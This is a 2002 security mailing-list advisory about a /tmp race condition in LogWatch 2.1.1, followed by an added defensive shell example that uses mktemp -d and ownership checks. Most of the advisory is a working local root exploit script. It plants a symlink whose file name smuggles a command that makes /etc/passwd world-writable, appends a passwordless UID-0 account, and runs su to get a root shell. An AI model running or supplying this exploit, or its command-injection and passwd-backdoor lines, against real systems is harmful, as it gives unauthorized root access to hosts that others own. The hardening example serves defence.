[EXPL] Root Compromise through LogWatch (Exploit code)
From: support@securiteam.com
Date: 03/28/02
From: support@securiteam.com To: list@securiteam.com Date: Thu, 28 Mar 2002 13:26:46 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Root Compromise through LogWatch (Exploit code)
------------------------------------------------------------------------
SUMMARY
<http://www.kaybee.org/~kirk/html/linux.html> LogWatch is a customizable,
pluggable log-monitoring system. It will go through your logs for a given
period and make a report in the areas that you wish with the detail that
you wish. Easy to use - works right out of the package on almost all
systems. This is like DailyScript, but much, much better... and designed
for RHL5. A /tmp race condition in the product can be used by local
attackers to gain root privileges.
DETAILS
Vulnerable systems:
LogWatch version 2.1.1
On a system running LogWatch, a local user is able to gain unauthorized
root access, due to a race condition during the temporary directory
creation.
Exploit:
cat > logwatch211.sh <<EOF
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>
SERVANT="00-logwatch" # Logwatch's cron entry
SCRIPTDIR=/etc/log.d/scripts/logfiles/samba/
echo
echo "LogWatch 2.1.1 root shell exploit"
echo '(c) Spybreak <spybreak@host.sk>'
echo
echo "Waiting for LogWatch to be executed"
while :; do
set `ps -o pid -C $SERVANT`
if [ -n "$2" ]; then
mkdir /tmp/logwatch.$2
ln -s $SCRIPTDIR'`cd etc;chmod 666 passwd #`' /tmp/logwatch.$2/cron
break;
fi
done
echo "Waiting for LogWatch to finish it's work"
while :; do
set `ps -o pid -C $SERVANT`
if [ -z "$2" ]; then
ls -l /etc/passwd|mail root
echo master::0:0:master:/root:/bin/bash >> /etc/passwd
break;
fi
done
su master
EOF
ADDITIONAL INFORMATION
The information has been provided by <mailto:spybreak@host.sk> Spybreak.
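
The temporary-directory flaw described under DETAILS, shown from the defender's side as an added example (not part of the original advisory and not LogWatch's own code). It contrasts a predictable, unchecked directory name with one created by mktemp -d; the function names, the PID 4242 and the sandbox directory standing in for /tmp are assumptions made for illustration.

```sh
#!/bin/sh
# Added illustration; function names are hypothetical, not LogWatch's code.

# Weak pattern: the name is predictable (prefix + PID) and a failed mkdir is
# ignored, so a directory somebody else created first is silently adopted.
weak_tmpdir() {                       # $1 = base dir, $2 = PID
    dir="$1/logwatch.$2"
    mkdir "$dir" 2>/dev/null || :     # the flaw: "already exists" is not fatal
    printf '%s\n' "$dir"
}

# Hardened pattern: mktemp -d picks an unpredictable name, creates the
# directory atomically with mode 0700, and fails if it cannot create it.
safe_tmpdir() {                       # $1 = base dir
    mktemp -d "$1/logwatch.XXXXXXXXXX"
}

# Sanity check before use: a real directory (not a symlink), owned by us,
# mode 0700, and empty. Anything else means it is not ours to trust.
is_private_dir() {
    [ -d "$1" ] && [ ! -L "$1" ] && [ -O "$1" ] || return 1
    case "$(ls -ld "$1")" in drwx------*) ;; *) return 1 ;; esac
    [ -z "$(ls -A "$1")" ]
}

demo() {
    base=$(mktemp -d) || return 1     # sandbox standing in for /tmp
    # Constructed state: another user got to the predictable name first.
    mkdir "$base/logwatch.4242" && : > "$base/logwatch.4242/cron"

    w=$(weak_tmpdir "$base" 4242)
    if is_private_dir "$w"; then echo "weak: private"
    else echo "weak: NOT private, contains: $(ls -A "$w")"; fi

    s=$(safe_tmpdir "$base") || return 1
    if is_private_dir "$s"; then echo "safe: private ($s)"
    else echo "safe: NOT private"; fi
    rm -rf "$base"
}
demo
```

A privileged job that must use a fixed path can apply the same test as is_private_dir and abort when it fails, rather than continuing inside a directory it did not create.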